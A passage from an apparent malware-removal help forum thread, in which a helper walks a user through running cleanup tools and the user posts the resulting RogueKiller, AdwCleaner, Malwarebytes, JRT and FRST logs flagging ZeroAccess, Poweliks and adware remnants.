Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6680.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 65 seconds with 60 seconds of active time.  This session ended with a crash.

Error: (11/15/2013 09:46:47 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 1065 seconds with 1020 seconds of active time.  This session ended with a crash.

Error: (10/29/2013 00:08:30 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 35 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (08/02/2013 09:06:29 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 3602 seconds with 1980 seconds of active time.  This session ended with a crash.

Error: (06/24/2013 11:08:23 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 388 seconds with 360 seconds of active time.  This session ended with a crash.

Error: (04/26/2013 05:29:18 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6665.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 135 seconds with 120 seconds of active time.  This session ended with a crash.

Error: (11/17/2012 10:44:45 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6607.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 85 seconds with 60 seconds of active time.  This session ended with a crash.

Error: (04/29/2012 10:11:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6607.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 15 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (04/28/2012 05:52:19 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6607.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 9 seconds with 0 seconds of active time.  This session ended with a crash.

==================== Memory info ===========================

Processor: Intel® Core™ i7 CPU 920 @ 2.67GHz
Percentage of memory in use: 20%
Total physical RAM: 12279.16 MB
Available physical RAM: 9754.61 MB
Total Pagefile: 24556.5 MB
Available Pagefile: 21190.34 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: (HP) (Fixed) (Total:100.18 GB) (Free:19.91 GB) NTFS
Drive d: (FACTORY_IMAGE) (Fixed) (Total:12.46 GB) (Free:2.25 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: (HP 2) (Fixed) (Total:120.14 GB) (Free:119.68 GB) NTFS
Drive m: (2TB 1) (Fixed) (Total:465.75 GB) (Free:183.15 GB) NTFS
Drive n: (2TB 2) (Fixed) (Total:465.75 GB) (Free:48.78 GB) NTFS
Drive o: (2TB 3) (Fixed) (Total:465.75 GB) (Free:188.4 GB) NTFS
Drive p: (2TB 4) (Fixed) (Total:465.77 GB) (Free:311 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 6C98FF9C)
Partition 1: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=465.8 GB) - (Type=OF Extended)

========================================================
Disk: 1 (Size: 232.9 GB) (Disk ID: CE79DF4F)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=100.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=120.1 GB) - (Type=OF Extended)
Partition 4: (Not Active) - (Size=12.5 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,087 posts
  • Gender:Male
  • Location:Germany
  • Local time:10:05 AM

Posted 20 October 2014 - 01:03 PM

Running from E:\

Why?

I need the logs of TDSSKILLER and RogueKiller ....

Step 1: AdwCleaner

Please download AdwCleaner (by Xplode) from the link below and save it to your Desktop:

Download Mirror #1
  • Right-click on AdwCleaner.exe and select Run as administrator. (If you have Windows XP, just run it.)
  • Click Scan and let the scan run.
  • When it finishes, click Clean, following the on-screen prompts.
  • After your computer reboots, a log will open. Please Copy (Ctrl+C) and Paste (Ctrl+V) this into your next post.
Note: The log can also be found in here: C:\AdwCleaner\

Step 2: Malwarebytes

Please download Malwarebytes Anti-Malware to your desktop. Install the programme and select Update.
Once it has updated, select Settings > Detection and Protection.
Tick Scan for rootkits.

Go back to the Dashboard and select Scan Now.

If threats are detected, click the Apply Actions button; MBAM will ask for a reboot.

On completion of the scan (or after the reboot) select View Detailed Log.
Select Export > Select text file and save to the desktop.
Attach/Post that log.

Step 3: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 4: FRST Scan
  • Run FRST. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FRST icon and select Run as Administrator)
  • Click Scan to start FRST.
  • When FRST finishes scanning, a log, FRST.txt, will open.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of this log into your next post please.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.



#5 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • Local time:09:05 AM

Posted 20 October 2014 - 05:33 PM

Running from E:\

Because it was empty.  I created a new user account that seemed clean, studied the threads with problems similar to mine, downloaded everything that I expected to need, and stuck it in the empty E:\.  I then found and removed Trojan.Sirede.C and Backdoor.OAccess. But obviously the backdoor had already taken hold. I have rkill logs from before and after if that would help.

 

Here are the current logs for RogueKiller.

 

TDSSKiller says 0 threats found but I cannot figure out how to capture or copy that report.  Copy-Paste won't work.

 

Will be back after running the rest of this.

 

Thanks

Jim

 

--------------------

 

RogueKiller V10.0.2.0 [Oct 16 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : JP [Administrator]
Mode : Scan -- Date : 10/20/2014  17:19:55

¤¤¤ Processes : 1 ¤¤¤
[Suspicious.Path] (SVC) ALSysIO -- \??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys[x] -> Stopped

¤¤¤ Registry : 25 ¤¤¤
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ALSysIO (\??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys) -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\ALSysIO (\??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys) -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\ALSysIO (\??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys) -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet003\Services\ALSysIO (\??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys) -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Internet Explorer\Main | Start Page : https://duckduckgo.com/  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Internet Explorer\Main | Start Page : https://duckduckgo.com/  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet003\Services\Tcpip\Parameters | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{00CC7F36-8FA0-4ED7-B2E6-6583421FF144} | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{00CC7F36-8FA0-4ED7-B2E6-6583421FF144} | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet003\Services\Tcpip\Parameters\Interfaces\{00CC7F36-8FA0-4ED7-B2E6-6583421FF144} | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32 -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 3 ¤¤¤
[ZeroAccess][File] @ -- C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\@ -> Found
[ZeroAccess][Folder] L -- C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\L -> Found
[ZeroAccess][Folder] U -- C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\U -> Found

¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost

¤¤¤ Antirootkit : 2 (Driver: Not loaded [0xc000036b]) ¤¤¤
[IAT:Addr] (iexplore.exe @ POWRPROF.dll) SETUPAPI.dll - CM_Get_DevNode_Status : C:\Windows\syswow64\CFGMGR32.dll @ 0x766c7498
[IAT:Addr] (iexplore.exe @ POWRPROF.dll) SETUPAPI.dll - CM_Get_Device_IDW : C:\Windows\syswow64\CFGMGR32.dll @ 0x766c86ef

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0:  +++++
--- User ---
[MBR] 6509a2393e3646b6e9b410946dd7d68a
[BSP] e0d495c3414ef7a8ecb7f01819d8cfbf : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 476925 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 976744448 | Size: 476925 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1953486848 | Size: 476925 MB
3 - [XXXXXX] EXTEN-LBA (0xf) [VISIBLE] Offset (sectors): -1364738048 | Size: 476952 MB
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )

+++++ PhysicalDrive1:  +++++
--- User ---
[MBR] b0cad70222274b0c308b904af5e37ca4
[BSP] 3c426ca8b2a7f6686f5ae7ee770c5a73 : Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 102587 MB
2 - [XXXXXX] EXTEN-LBA (0xf) [VISIBLE] Offset (sectors): 210307072 | Size: 123027 MB
3 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 462267777 | Size: 12756 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive2:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive3:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive4:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive5:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive6:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

============================================
RKreport_DEL_10172014_222738.log - RKreport_SCN_10172014_222425.log - RKreport_SCN_10172014_223001.log



#6 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • Local time:09:05 AM

Posted 20 October 2014 - 06:29 PM

Here are the logs from ADWc, MBAM, JRT, and FRST.

 

-------------------------------------

 

# AdwCleaner v4.000 - Report created 20/10/2014 at 17:45:24
# DB v
# Updated 12/10/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (64 bits)
# Username : JP - JIM-PC
# Running from : E:\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

[x] Not Deleted : C:\Users\JP\AppData\Roaming\AVG Secure Search
[x] Not Deleted : C:\Users\JP\AppData\LocalLow\AVG Security Toolbar
Folder Deleted : C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games
Folder Deleted : C:\Program Files (x86)\GreenTree Applications

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\AskInstallChecker-1_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\AskInstallChecker-1_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\HPSF_Tasks_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\HPSF_Tasks_RASMANCS
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{CC5AD34C-6F10-4CB3-B74A-C2DD4D5060A3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BCFF5F55-6F44-11D2-86F8-00104B265ED5}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{13ABD093-D46F-40DF-A608-47E162EC799D}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F25AF245-4A81-40DC-92F9-E9021F207706}
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{CCC7A320-B3CA-4199-B1A6-9F516DD69829}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}]
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BCFF5F55-6F44-11D2-86F8-00104B265ED5}
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe]
Key Deleted : HKCU\Software\MGShareware
Key Deleted : HKLM\SOFTWARE\Conduit
Key Deleted : HKLM\SOFTWARE\MGShareware

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16526

-\\ Google Chrome v

*************************

AdwCleaner[R0].txt - [4060 octets] - [20/10/2014 17:38:50]
AdwCleaner[S0].txt - [3987 octets] - [20/10/2014 17:45:24]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [4047 octets] ##########

 

 

--------------------------

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/20/2014
Scan Time: 5:55:00 PM
Logfile: MBAM102014 18_10.TXT
Administrator: No

Version: 2.00.3.1025
Malware Database: v2014.10.20.07
Rootkit Database: v2014.10.17.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: JP

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 337610
Time Elapsed: 14 min, 17 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Warn
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

 

---------------------------

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.14.2014:1)
OS: Windows 7 Professional x64
Ran by JP on Mon 10/20/2014 at 18:13:08.35
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

 

~~~ Registry Values

Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-19\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-20\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Internet Explorer\Main\\Start Page

 

~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\msntask_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\msntask_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\msntask_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\msntask_RASMANCS
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}

 

~~~ Files

 

~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\freerip"
Successfully deleted: [Folder] "C:\Program Files (x86)\freerip3"
Successfully deleted: [Empty Folder] C:\Users\JP\appdata\local\{f74e7a95-1d32-0366-baea-5ce012d107ec}

 

~~~ Event Viewer Logs were cleared

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 10/20/2014 at 18:16:47.65
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-------------------------------

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by JP (administrator) on JIM-PC on 20-10-2014 18:18:56
Running from E:\
Loaded Profile: JP (Available profiles: JP & JR)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
(ANTS) C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe
() C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
() C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneCmd.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Speedbit Ltd.) C:\Program Files (x86)\DAP\DAP.exe
() C:\Program Files\Core Temp\Core Temp.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(Novatel Wireless Inc.) C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Hewlett-Packard) C:\Program Files (x86)\hp\HP Software Update\hpwuschd2.exe
(Research In Motion Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\Ctxfihlp.exe
(CANON INC.) C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgui.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTxfispi.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

